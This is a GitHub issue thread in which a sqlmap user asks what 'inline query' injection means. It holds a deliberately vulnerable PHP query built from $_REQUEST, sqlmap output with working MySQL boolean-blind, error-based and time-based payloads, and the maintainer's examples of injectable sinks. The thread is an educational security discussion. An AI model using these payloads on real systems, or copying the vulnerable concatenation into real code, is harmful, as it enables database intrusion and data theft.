### ISSUE TITLE
question about inline query

### ISSUE THREAD

**Issue by turn1tup** [sqlmapproject/sqlmap#3719]
Hello,I'm very sorry about to ask this question,but I can't solve it.I keep this question one year.And this is not a bug.
What the exactly meaning of "inline query" and it's sence.
I know sqlmap think there are 4 clause condition in mysql inline query
1: WHERE / HAVING
2: GROUP BY
3: ORDER BY
8: Column name

I'have do a test as below

create table User_Address(
zip_code text,
user_id int
);
create table User_Score(
score int,
user_id int
);

INSERT INTO `test`.`user_address` (`zip_code` ,`user_id`) VALUES ('1', '1');
INSERT INTO `test`.`user_address` (`zip_code` ,`user_id`) VALUES ('2', '2');
INSERT INTO `test`.`user_address` (`zip_code` ,`user_id`) VALUES ('3', '2');
INSERT INTO `test`.`User_Score` (`score` ,`user_id`) VALUES ('10', '1');
INSERT INTO `test`.`User_Score` (`score` ,`user_id`) VALUES ('20', '2');
INSERT INTO `test`.`User_Score` (`score` ,`user_id`) VALUES ('30', '3');

SELECT a2.ZIP_CODE, COUNT(a1.User_ID) 
FROM 
(SELECT User_ID, SUM(Score) FROM User_Score GROUP BY User_ID HAVING SUM(Score) > 10) a1, 
User_Address a2 
WHERE a1.User_ID = a2.User_ID 
GROUP BY a2.ZIP_CODE;

$sql="SELECT a2.ZIP_CODE, COUNT(a1.User_ID) 
FROM 
(SELECT User_ID, SUM(Score) FROM User_Score GROUP BY ".$_REQUEST['group_by']." HAVING SUM(Score) > 10) a1, 
User_Address a2 
WHERE a1.User_ID = a2.User_ID 
GROUP BY a2.ZIP_CODE";

the result after running sqlmap :
---
Parameter: group_by (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: group_by=(SELECT (CASE WHEN (7734=7734) THEN 0x557365725f4944 ELSE (SELECT 8348 UNION SELECT 2875) END))
    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: group_by=User_ID AND (SELECT 9569 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(9569=9569,1))),0x7176766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SLEEP)
    Payload: group_by=User_ID AND SLEEP(5)
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---

so,how can I create a condition that fit the inline of sqlmap's in mysql.
Thank you very much.

**Comment by stamparm** [comment]
Inline query, is as the name says, **inline**. Those are all cases where the RAW query can just be injected without any prefix and/or suffix. You put the SQL query and it works.

Now, in real life, those are cases such as:

1) `mysql_query($_REQUEST['sql'])`
OR
2) `mysql_query("SELECT * FROM users WHERE id=($_REQUEST['id'])")`  # with DBMS error reporting turned on
OR
...

So, basically, any kind of situation where (e.g.) simple `?vuln_param=SELECT @@version` works
